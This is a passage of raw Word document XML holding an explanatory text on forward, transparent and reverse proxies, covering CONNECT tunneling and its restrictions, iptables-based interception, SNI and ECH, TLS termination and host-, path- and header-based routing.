    <w:p w14:paraId="753E6528" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>HTTP/1.1 200 Connection Established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBAC95" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>At this point, the proxy's TCP connection to the client and its TCP connection to the server are spliced together.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The proxy becomes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dumb byte pipe</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — it forwards all subsequent bytes between client and server without inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD8D67A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client now performs TLS handshake directly with www.example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — through the proxy's byte pipe. The proxy cannot see the TLS handshake or any subsequent traffic because it only has raw bytes, not TLS keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A8D406" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="535"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client sends encrypted HTTP requests inside the TLS tunnel.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The proxy forwards them as opaque bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDAAB84" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The security implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> With CONNECT tunneling, the forward proxy </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot inspect HTTPS traffic content</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. It knows the destination hostname (from the CONNECT request) but not the specific URL, headers, or body of each request. This is why enterprise proxies performing SSL inspection require deploying a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>custom CA certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> on all client devices — the proxy performs a man-in-the-middle, terminating TLS from both sides (see SSL inspection section).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2CFC8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The CONNECT abuse problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> CONNECT creates arbitrary TCP tunnels. A malicious client could CONNECT to port 25 of a mail server and use the proxy to send spam, or connect to any arbitrary host on any port. This is why production forward proxies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819E38E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Restrict CONNECT to port 443 only (or a whitelist of ports).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B8564" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Apply destination hostname whitelists or blacklists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A79401E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Rate-limit CONNECT tunnels per client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789DA339" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="536"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Require authentication before allowing CONNECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BCA3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transparent Proxies — Intercepting Without Client Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9EB1C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transparent proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (also called an intercepting proxy or inline proxy) intercepts traffic </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without any client configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. The client has no idea its traffic is being proxied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D7B6B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network-level interception mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14A771" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The network infrastructure (router, firewall, switch) is configured to redirect traffic destined for port 80 or 443 to the proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F685F49" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using iptables/nftables (Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C4710" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF1EF6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3774C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>All TCP packets to port 80 are redirected to port 3128 (the proxy) before routing. The proxy receives the packet, uses SO_ORIGINAL_DST socket option (or getsockopt(IP_TRANSPARENT)) to retrieve the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>original destination IP and port</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (what the client intended to connect to before redirection), then proxies accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF44D5E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using BGP/routing-level interception:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> In ISP-scale deployments, BGP policy routing redirects traffic from an entire subnet to the proxy cluster. Every client in the subnet is transparently proxied regardless of their device configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948CFCF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The transparent HTTPS problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59592F09" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>For HTTP, transparent proxying is straightforward — the proxy reads the Host header to determine the destination. For HTTPS, the client sends a TLS ClientHello before any HTTP is visible. The proxy cannot read the encrypted destination. Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6E4941" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SNI (Server Name Indication) interception:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The TLS ClientHello contains the SNI extension — the hostname the client is connecting to — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in cleartext</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> (unencrypted, as it must be visible to the server for certificate selection before encryption is established). The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>transparent proxy reads the SNI extension from the ClientHello to determine the destination hostname, even though it cannot read the encrypted traffic itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD2C6A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP-based routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If SNI is unavailable (older clients) or intentionally omitted (for privacy), the proxy falls back to using the destination IP address. But since many sites share IP addresses (CDN, virtual hosting), IP alone is insufficient — the proxy may not know which specific hostname the client is connecting to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9DA443" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ESNI/ECH (Encrypted Client Hello):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A newer TLS extension that encrypts the SNI extension itself. Designed specifically to prevent network-level eavesdropping on which hostname a client is connecting to. When clients use ECH, transparent proxies that rely on SNI inspection are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — they know the destination IP but not the hostname. This is a fundamental shift in the network visibility/privacy trade-off and is actively debated between network operators (who want visibility) and privacy advocates (who want opacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3A2AA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="66232190">
          <v:rect id="_x0000_i3053" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D742535" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Reverse Proxy — Server-Side Proxying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC426BD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Fundamental Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EFB40" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> acts on behalf of </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>servers</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Clients connect to the reverse proxy thinking they're connecting to the actual server. The reverse proxy forwards requests to one or more backend servers and returns the responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC990E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7DE47" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Client (unaware of proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA74221" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    ↓  Connects to proxy's IP (thinks it's the server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A0BB09" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reverse Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35343A50" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">    ↓  New connection to actual backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FADD413" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Backend Server(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD9B8B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The client doesn't know a proxy exists. The backend servers see the proxy's IP, not the client's IP (unless the proxy forwards client IP in headers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134F7A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental inversion from forward proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D27BE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Forward proxy: client knows about proxy, destination doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA83B6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reverse proxy: destination knows about proxy, client doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5B8EDF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Reverse Proxies Do Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C84CBDE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSL/TLS Termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8DC8BB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The reverse proxy terminates TLS from clients. It holds the server's private key and certificate. After TLS termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A99E8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Traffic from proxy to backend can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plain HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (if the backend network is trusted — same datacenter, VPN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF294D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="538"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Traffic from proxy to backend can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS with a different certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (internal certificate, mutual TLS for service identity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57706EE0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS termination at the proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> centralizes certificate management — one certificate per domain, renewed once, applied everywhere. Without the proxy, every backend server would need the certificate and private key, multiplied across potentially hundreds of instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A638A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HTTPS between proxy and backend decision:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Many deployments use HTTP between the reverse proxy and backend (unencrypted internal traffic). This is acceptable when the internal network is trusted (RFC 1918 addressing, dedicated network hardware, no multi-tenancy). It is unacceptable when using shared cloud networks, multi-tenant infrastructure, or when compliance requirements mandate encryption in transit everywhere. Modern deployments increasingly use mTLS between proxy and backend — the proxy authenticates to the backend with a client certificate, the backend verifies it came from the proxy and not a rogue client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A968A5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13204EAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The reverse proxy routes requests to different backends based on application-layer content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5976CFF5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Host-based routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Multiple domains share the same proxy and IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14E20A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42307306" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>api.example.com  → API service cluster (10.0.1.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B97B67" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>www.example.com  → Web server cluster (10.0.2.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C0108A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>admin.example.com → Admin service (10.0.3.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404723BF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy reads the HTTP Host header (or TLS SNI) and selects the backend cluster. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>virtual hosting at the proxy layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — one IP, multiple services, clean separation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04333746" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Path-based routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> A single domain, different paths to different backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC3D97" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B339670" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>example.com/api/*     → API service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551EEC3A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>example.com/static/*  → Object storage / CDN origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5946FD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>example.com/admin/*   → Admin service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62050A2F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>example.com/*         → Web frontend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664A8B4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The proxy reads the URL path and applies routing rules. This is how microservices are exposed through a single public endpoint — the proxy is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that routes to the appropriate microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8F65B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Header-based routing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Route based on arbitrary HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FFC95E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCD97E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>X-API-Version: v2   → v2 backend cluster</w:t>
      </w:r>
    </w:p>
